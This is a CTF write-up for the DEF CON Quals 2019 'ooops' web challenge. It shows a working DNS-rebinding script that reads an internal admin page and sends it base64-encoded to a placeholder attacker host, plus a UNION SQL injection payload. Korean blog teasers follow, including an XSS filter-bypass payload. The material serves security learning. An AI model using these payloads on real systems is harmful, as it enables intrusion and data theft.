Defcon CTF quals 2019 : ooops

  • Category: Web
  • Points: 137
  • Solves: 34
## Description

```
On our corporate network, the only overflow is the Order of the Overflow.
<a href="https://s3.us-east-2.amazonaws.com/oooverflow-challs/b48fb18a0837e8e6840d5101ff44bb9ee5ee1d22846580487ccce756b966f6b2/info.pac">info.pac</a>
```

## Write-up

### 1. javascript deobfuscate.

Change `eval` to `console.log`.

```js
FindProxyForURL = function(url, host) {
 /* The only 'overflow' that employees can access is the Order of the Overflow. Log in with OnlyOne:Overflow. HTTPS support is coming soon. */ 
 if (shExpMatch(host, 'oooverflow.io')) return 'DIRECT';
 return 'PROXY ooops.quals2019.oooverflow.io:8080';
}
```

we can access challenge page !

### 2. DNS Rebinding.
if you send a URL, the bot access to the URL. And you look at the referer of http header, you can see that it starts from the internal IP address. (ex: 10.x.x.x)

I tried DNS rebinding. I could not access the internal page using XHR because of SOP(same origin policy).

```
1. Send my server Address ( ex: [A.hacker.com] == my server address )
2. Check the bot's connection and referer header(Internal Address).
3. Send js Script to bot.
4. Change [A.hacker.com]'s DNS to Internal Address. ( ex: [A.hacker.com] == 10.x.x.x )
```

- server.py

```python
from flask import Flask, request
import threading
import time

app = Flask(__name__)

@app.route("/")
def hello():
    re = request.headers['Referer']
    print re
    return open('index.html').read()

app.run(host='0.0.0.0', port=5000)
```

- index.html

```html
<script>
setTimeout(function() {
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "http://[A.hacker.com]/admin/view/1");
  xhr.onreadystatechange = function () {
    if (xhr.readyState === 4) {
      var img = new Image();
      img.src = "http://[hacker.com]/res?x=" + btoa(xhr.responseText);
    }
  };
  xhr.send();
}, 10000);
</script>
```

### 3. SQL Injection.

Now We can see the internal page ! And It looks like a SQL injection !

- response html

```html
<!doctype html>
<html>
<head>
<title>OOOPS &mdash; Evaluate Requests</title>
<link href="/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous"></head>
<body>
<div class="container">
<div class="row">

<!-- Query: select rowid,* from requests where rowid=1; -->

<p>
Request #1 from b&#39;10.255.0.2&#39;.
 Automatically evaluated 
</p>

<a id="lnk" class="btn btn-secondary btn-block btn-lg" href="http://3ccdcab0.0a00061a.rbndr.us:5000">
Visit http://3ccdcab0.0a00061a.rbndr.us:5000
</a>

</div>
</div>
</body>
</html>
```

- index.html

```html
<script>
setTimeout(function() {
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "http://[A.hacker.com]/admin/view/-1%20union%20select%201,2,3,group_concat(flag),5%20from%20flag");
  xhr.onreadystatechange = function () {
    if (xhr.readyState === 4) {
      var img = new Image();
      img.src = "http://[hacker.com]/res?x=" + btoa(xhr.responseText);
    }
  };
  xhr.send();
}, 10000);
</script>
```

## FLAG

OOO{C0rporateIns3curity}


## References

- <a target="_blank" href="https://imjuno.com/2018/02/01/attack-block-chain-nodes-json-rpc-with-efficient-dns-rebinding-attack/">https://imjuno.com/2018/02/01/attack-block-chain-nodes-json-rpc-with-efficient-dns-rebinding-attack/</a>






































댓글











댓글 쓰기























이 블로그의 인기 게시물









SSRF to Redis





















 SSRF (Server-Side Request Forgery)  SSRF는 서버의 요청을 변조하여 원하는 데이터 또는 원하는 타겟에 대해 서버의 자원을 이용해 요청을 보내는 공격 방법입니다.  다수의 마이크로 서비스로 이루어지는 모던 스택 또는 다른 서비스와 상호작용하는 형태에서 다른 서비스에 접근하여 취약점을 유발하는 SSRF취약점의 가치는 증가하게 되었습니다.   Redis   Key-Value 데이터 모델을 가진 NoSQL 데이터베이스입니다. 데이터를 메모리에 저장하는 인메모리 데이터베이스로 read/write 속도가 빠르다는 장점으로 대중적으로 많이 사용되고 있습니다.   Redis는 왜 해커의 타겟이 되었나?   Redis는 SSRF취약점 발생 시 주로 타겟이 되는 서비스 중 하나입니다. 이에 대한 이유는 아래와 같다고 생각됩니다.     - 인증 체계   기본적으로 Redis는 인증 체계가 없으며, bind 127.0.0.1, port 6379로 서비스가 설정됩니다.   redis.conf의 내용 중 port와 bind에 대한 내용입니다. ```apache # Accept connections on the specified port, default is 6379. # If port 0 is specified Redis will not listen on a TCP socket. port 6379  ...  # By default Redis listens for connections from all the network interfaces # available on the server. It is possible to listen to just one or multiple # interfaces using the "bind" configuration directive, followed by one or # more IP addresses. # # Examples: # # bind 192.168.1.100 10.0.0.1 bind 12...








자세한 내용 보기










악성(피싱) 앱 분석기 




















이미지







 - 분석은 예전에 했는데 시간이 바쁘다는 핑계로 글은 이제서야 쓰게 되었습니다. T.T  - 악성코드를 주로 다루지 않다보니 잘못된 부분이 있을 수 있습니다. 해당 부분에 대해 알려주시면 감사하겠습니다.  # 발단  최근 들어 피싱 문자가 많이 늘어난게 보인다. 지인에게 short url 서비스로 보내진 주소를 공유받아 접속해보았다.  처음 부터 흥미를 자극하는 난독화된 JS 코드가 보인다.  ...   코드 마지막 부분에 보면 함수 호출`()`로 끝난다. 실제 로직이 포함된 코드를 실행하기 위해 마지막에 함수 호출을 할테니 해당 부분을 빼고 콘솔에서 실행해보았다.  ```javascript (function anonymous( ) { var rNsMwWzBiNaSuYcTeJbHfLvZlTaRjBaMoZkUfOsFqMcGkCtRjUsKuSwHrYwVgXaSkUhKjPnFkPvDoMlQkTwJbAyDuZvV = { 			yCdZwGrUaDePkOsWuVyCuEpSdNfQsWaEjFeCgRaLkIt: function () { 				var u = navigator.userAgent, app = navigator.appVersion; 				return { 					uQnJaNmSpFjMeVbT: u.indexOf('Trident') > -1,  					lWtPeOsDbQnQbFiLdFpNfPaLxAzFeKvZyQzRcMlWnEpS: u.indexOf('Presto') > -1, 					gPxUjAsWuQnQuEaLkHyPoFjNuXpOyBhWjTdVfQbDoNyUfPgRjUwHzJiXaFeDnFwVfDpAzTyD: u.indexOf('AppleWebKit') > -1,  					nQzDtOzQiMiLpLpMdSwOyPhFxIeJnYiEwGrCfLjNfVgKuFiLrJuLvFqIsCuLkCfWlDcLrXvBuMsYjB: u.indexOf('Gecko') > -1 &&...








자세한 내용 보기










[python-markdown2] safe_mode Filter bypass 분석글




















이미지







 개요  * 작성일 기준 version: 2.3.8 ( https://github.com/trentm/python-markdown2/tree/4d2fc792abd7fbf8ddec937812857f13fded61cf )   CTF하다가 markdown2 모듈을 사용하길래 해당 모듈 찾아보다가 아래 이슈를 발견하였다.  https://github.com/trentm/python-markdown2/issues/341      Filter Bypass ????!!  - Expected Result  ```python >>> import markdown2 >>> markdown2.markdown("[<script>alert(1)</script>]()", safe_mode=True) '<p><a href="#">[HTML_REMOVED]alert(1)[HTML_REMOVED]</a></p>\n' ```  - Issue Payload  ```python >>> import markdown2 >>> markdown2.markdown('<http://g<!s://q?<!-<[<script>alert(1);/\*](http://g)->a><http://g<!s://g.c?<!-<[a\\*/</script>alert(1);/*](http://g)->a>', safe_mode=True) '<p><http://g<!s://q?<!-&lt;<a href="http://g"><script>alert(1);/*</a>->a><http://g<!s://g.c?<!-&lt;<a href=...








자세한 내용 보기